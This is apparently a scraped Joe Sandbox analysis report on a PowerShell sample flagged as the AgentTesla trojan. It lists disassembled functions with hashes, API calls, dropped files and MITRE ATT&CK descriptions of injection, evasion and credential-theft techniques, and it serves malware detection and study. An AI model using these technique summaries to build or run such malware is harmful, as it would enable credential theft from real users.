Opcode Fuzzy Hash: 96b985c61ab27a49897608c3d69a1f0edf274f615a9e3583a75352c912115b9c
Instruction Fuzzy Hash: 45118E32B505245BDF999678D8286AEB7EBEBC8610F004539C40AE7344DE29DC069BE1

Function 06093ED0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32b5a628b7e94e6a6d38a66837aad7109b677ff9bda9582a73ac81ea2287490b
Instruction ID: c4caf62b7c409e7265401e935d6268d8b17a55d61c9af02a41c79f52ef3b2584
Opcode Fuzzy Hash: 32b5a628b7e94e6a6d38a66837aad7109b677ff9bda9582a73ac81ea2287490b
Instruction Fuzzy Hash: 4801F531B441010BDFA99A7C946071AABEBCBCA724F11843AE00ECB341ED25CC0347A1

Function 0609EE5F Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8332bb120d3a818825034f974a5059334455cbb8b94beb6fd7b0415b65c6a658
Instruction ID: 4388d787f7bc32a77b86f54c1d70413a2e91e957fefb1d513f54a246d10fa692
Opcode Fuzzy Hash: 8332bb120d3a818825034f974a5059334455cbb8b94beb6fd7b0415b65c6a658
Instruction Fuzzy Hash: 06017135B401101BDBA5D678D865B6F6BE7DBCA624F24883EE40AC7351E925CC074391

Function 06096500 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b58d698d991c805a340b981931a76abb3f57043f0ad2c79a0b13aaf067f41cc
Instruction ID: 444c10c7a0c6a078398736f45f61fc9676579b07d7c4768b7674d304f7d021a0
Opcode Fuzzy Hash: 3b58d698d991c805a340b981931a76abb3f57043f0ad2c79a0b13aaf067f41cc
Instruction Fuzzy Hash: 951180A1C1D3D55FDB428B3888A85943F75EF13204F1A04DBC0C5CF1A3E96A891BD366

Function 06093958 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 086a00db0cc43ff73eb1afb38bb8e180ef622278f54fcb912ac647732889a084
Instruction ID: ec5c535a74ef9396e9a6b771c11d4ebff68cfd07d5e72d2bf5bb69c7b33e2212
Opcode Fuzzy Hash: 086a00db0cc43ff73eb1afb38bb8e180ef622278f54fcb912ac647732889a084
Instruction Fuzzy Hash: 4311CFB5D01259AFCB00CF9AD884ADEFFB4FB49314F10812AE918A7200C778A944CFA5

Function 06093EE0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce3dc2f9540826922ab594a7bdd1dfd6a1ccc978b7c114ffd01df3e18e2c9c6c
Instruction ID: badfd9152ededb6916b619590d8fc3d9e32dfe6037e21c22a47042f253588cd1
Opcode Fuzzy Hash: ce3dc2f9540826922ab594a7bdd1dfd6a1ccc978b7c114ffd01df3e18e2c9c6c
Instruction Fuzzy Hash: 36016D31B401160BEFA8996DD464B2FA7EBCBC9B28F218439F10EC7354EE65DC0247A1

Function 06093950 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c681af73817592efaa698182edfcca1b08082ed5c930254080213c91bbbf7d3d
Instruction ID: 2053330fa9ed762f0e301ba8a46dc86f764be8b7eacbf21030a695ea03833132
Opcode Fuzzy Hash: c681af73817592efaa698182edfcca1b08082ed5c930254080213c91bbbf7d3d
Instruction Fuzzy Hash: 4B21CCB5D00259DFCB00CF9AD984ADEFBB5FB48314F10812AE918A7240C778A954CFA4

Function 0609EE70 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64702ade5f5492ac613034006abdcc4eb3a2c7d30f9996f82edbac583a9c8f64
Instruction ID: 734a5786754dc5f1c88d785d487a41af13580013271de4fde3dc6c3b85a99bb5
Opcode Fuzzy Hash: 64702ade5f5492ac613034006abdcc4eb3a2c7d30f9996f82edbac583a9c8f64
Instruction Fuzzy Hash: 9F018C35B000104BDFA5DA7DD854B2E7BEBDBCA624F20883DE50AC7350EA26DC0383A1

Function 06093C92 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50c8a9fc7232f4394915892cf2902f191efb473a8b2e67bb9da049e633bf2dab
Instruction ID: ebebd4d9c37f9a1cc5cf96be8037f14600b2cf9ae0ce28ecc82fa27932eeacbd
Opcode Fuzzy Hash: 50c8a9fc7232f4394915892cf2902f191efb473a8b2e67bb9da049e633bf2dab
Instruction Fuzzy Hash: B4018F32B504255BDF989668DC146AEA7EBABC8610F144139C00AE7384DA658C078B91

Function 0609A3F0 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bc91d6e66051c7738705e6f9efb06d81346a7357644ed850126b448dc4c22b2
Instruction ID: adbb893e025b46fab0ade195fe848968112363e3c5dbd6cef0296d2cf36c0013
Opcode Fuzzy Hash: 8bc91d6e66051c7738705e6f9efb06d81346a7357644ed850126b448dc4c22b2
Instruction Fuzzy Hash: DA018171B100151FDFA5967CD858B1E77DADBCA714F108439E00AC7354DE25DD029BA1

Function 0609C8B0 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2cfb371be9d10eed3dbdc6c6d62ce37561e2cb5564ca714019b6a91af5f60f4
Instruction ID: 5681c129e1f553d5ddc3e1344834587e040e24396f73928371f0fc11b371523e
Opcode Fuzzy Hash: b2cfb371be9d10eed3dbdc6c6d62ce37561e2cb5564ca714019b6a91af5f60f4
Instruction Fuzzy Hash: 7701F931F101289BEF589A65F840A9EB77AEB85314F108539E905E7345DB31AC04CB90

Non-executed Functions

Function 06097770 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$]q, xrefs: 06097CF1
$]q, xrefs: 06097C52
$]q, xrefs: 06097CFB
$]q, xrefs: 06097889
$]q, xrefs: 06097C46
$]q, xrefs: 060978BA
$]q, xrefs: 06097D07
$]q, xrefs: 06097895
$]q, xrefs: 060978C6
$]q, xrefs: 06097CE5

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-2843079600
Opcode ID: c79d63fd696ffbd55f5b3268498b99c6f99f83163774dda49ec19c4df5b7d419
Instruction ID: fb85c74d1b9dc3617011fcfcea180f35ec0ed8d6fa1b99382dfaf26c6b9e2dd3
Opcode Fuzzy Hash: c79d63fd696ffbd55f5b3268498b99c6f99f83163774dda49ec19c4df5b7d419
Instruction Fuzzy Hash: 13125D31A512198FDF68DF78C894AADBBF2BF84304F208569D409AB355DB349D45CB90

Function 0609AA18 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$]q, xrefs: 0609AB75
$]q, xrefs: 0609ABCA
$]q, xrefs: 0609AB94
$]q, xrefs: 0609AB69
$]q, xrefs: 0609AB0E
$]q, xrefs: 0609ABA0
$]q, xrefs: 0609ABD6
$]q, xrefs: 0609AB1A

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-1273862796
Opcode ID: e0e3ffd1e2f3a6d609cb15d888c42714fb6abe8ec4837d0404236e18e22dcdf2
Instruction ID: 3be3acc63b109212a0c2f8cb7e6b53a5aa01ca09ce23369c9201c53efd880798
Opcode Fuzzy Hash: e0e3ffd1e2f3a6d609cb15d888c42714fb6abe8ec4837d0404236e18e22dcdf2
Instruction Fuzzy Hash: C4918D30B41209DFDFA8DB68D594B6E7BF7AF84301F208429E8069B355DB789941DBA0

Function 06097170 Relevance: 9.2, Strings: 7, Instructions: 405COMMON

Download Yara Rule

Strings

$]q, xrefs: 060974AC
$]q, xrefs: 06097678
.5uq, xrefs: 060971CB
$]q, xrefs: 0609760C
$]q, xrefs: 06097452
$]q, xrefs: 060974B8
$]q, xrefs: 06097684

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-981061697
Opcode ID: 54391658bcda99565e004dc284e313f20117dfe947913233c0c5a17a4b895cb6
Instruction ID: af86678c75afa5d06a76faac9b75515ec5f9b44601ef80f596677159362de071
Opcode Fuzzy Hash: 54391658bcda99565e004dc284e313f20117dfe947913233c0c5a17a4b895cb6
Instruction Fuzzy Hash: F5F13B31A51208CFDB59EFA8D554A6EBBB7FF84304F208568D8059B369DB389C42DB90

Function 053A3A18 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 053A3A96
GetCurrentThread.KERNEL32 ref: 053A3AD3
GetCurrentProcess.KERNEL32 ref: 053A3B10
GetCurrentThreadId.KERNEL32 ref: 053A3B69

Memory Dump Source

Source File: 00000004.00000002.4524311151.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_53a0000_RegAsm.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 842d5c6ebee8628d3ab43f2786a752c9076573059d8f00dbcb1731b14c9162c0
Instruction ID: dcff54a47bd202e7804ec5c26c95c9309d6d72c26509de489b86996bf032c287
Opcode Fuzzy Hash: 842d5c6ebee8628d3ab43f2786a752c9076573059d8f00dbcb1731b14c9162c0
Instruction Fuzzy Hash: D75158B09003498FDB58DFA9D948BEEBBF5FF88304F208459E019A7360D7789944CB65

Function 053A3A12 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 053A3A96
GetCurrentThread.KERNEL32 ref: 053A3AD3
GetCurrentProcess.KERNEL32 ref: 053A3B10
GetCurrentThreadId.KERNEL32 ref: 053A3B69

Memory Dump Source

Source File: 00000004.00000002.4524311151.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_53a0000_RegAsm.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 2a7ab25d9cd47b0aacbc16729d02407286abd960f4f8b7b3adc6e0957129e781
Instruction ID: 34c3f6389ee45f047a7e33a4e3f6e882047e2fa6b66b922c791a398595784e7a
Opcode Fuzzy Hash: 2a7ab25d9cd47b0aacbc16729d02407286abd960f4f8b7b3adc6e0957129e781
Instruction Fuzzy Hash: 775166B0900209CFDB48DFA9D948BEEBBF5FF88304F208419E009A73A0D7789944CB65

Function 060984A8 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$]q, xrefs: 06098773
$]q, xrefs: 0609870E
$]q, xrefs: 06098702
$]q, xrefs: 06098767

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 73fd5eab01d0418139f29249149bc4b069e52173b644fbad638a88c195e2e47e
Instruction ID: 7097a392eb774e88486663aa40a08d3aecacb9b137c63d58cd4f93b83e9c3431
Opcode Fuzzy Hash: 73fd5eab01d0418139f29249149bc4b069e52173b644fbad638a88c195e2e47e
Instruction Fuzzy Hash: 01B14930A002098FDB98EF64D594A6EBBF7FF85304F24C829D4069B355DB75D886DBA0

Function 060988C0 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

$]q, xrefs: 0609894B
$]q, xrefs: 0609893F
LR]q, xrefs: 06098A02
LR]q, xrefs: 060989B3

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID: LR]q$LR]q$$]q$$]q
API String ID: 0-3527005858
Opcode ID: 0716b37bb55e4a8571e021307e7a1400fd8b5072a5c086e1bd2da2ac6e3b3b4b
Instruction ID: 0136f6e5a51b5d9d0573943bcd5ad812e8c105acca3fa4724095ed8beb594697
Opcode Fuzzy Hash: 0716b37bb55e4a8571e021307e7a1400fd8b5072a5c086e1bd2da2ac6e3b3b4b
Instruction Fuzzy Hash: 13519D30B402059FDB58DF28D990A6E7BF6FF89304F14C968E4169B3A5DA35EC41CBA1

Function 0609ADA0 Relevance: 5.2, Strings: 4, Instructions: 166COMMON

Download Yara Rule

Strings

$]q, xrefs: 0609AF24
$]q, xrefs: 0609AED1
$]q, xrefs: 0609AF7C
$]q, xrefs: 0609AF53

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: dcd97008f56bbea821608d8f254b9a3ee62c31ed4ea0307af9cd200446ce05d8
Instruction ID: 9c157ebb9678a723c617aed36f49c25d8024f1c1a9c5467982078bb5f6d09668
Opcode Fuzzy Hash: dcd97008f56bbea821608d8f254b9a3ee62c31ed4ea0307af9cd200446ce05d8
Instruction Fuzzy Hash: 6751A070B502048FDFA9DBA8D590AAEBBF7EB84314F208529E406D7355DB35DC42DBA0

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 7dtpow.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cgusurrw.42y.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e3sxd0er.opv.ps1

C:\Users\user\AppData\Local\Temp\x.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VNW8BYZ5ALUK410RGVG0.temp

C:\Windows\INF\WmiApRpl\WmiApRpl.h

C:\Windows\INF\WmiApRpl\WmiApRpl.ini

C:\Windows\System32\PerfStringBackup.INI

C:\Windows\System32\PerfStringBackup.TMP

C:\Windows\System32\perfc009.dat

C:\Windows\System32\perfh009.dat

Windows Analysis Report
7dtpow.ps1

Function 02BC6374 Relevance: 1.8, APIs: 1, Instructions: 342
processCOMMON

Function 02BC57CC Relevance: 1.8, APIs: 1, Instructions: 341
processCOMMON

Function 02BC70D0 Relevance: 1.6, APIs: 1, Instructions: 120
injectionCOMMON

Function 02BC583C Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Function 02BC580C Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Function 02BC6B20 Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Function 02BC5824 Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Function 02BC6D28 Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Function 02BC5854 Relevance: 1.6, APIs: 1, Instructions: 96
threadCOMMON

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

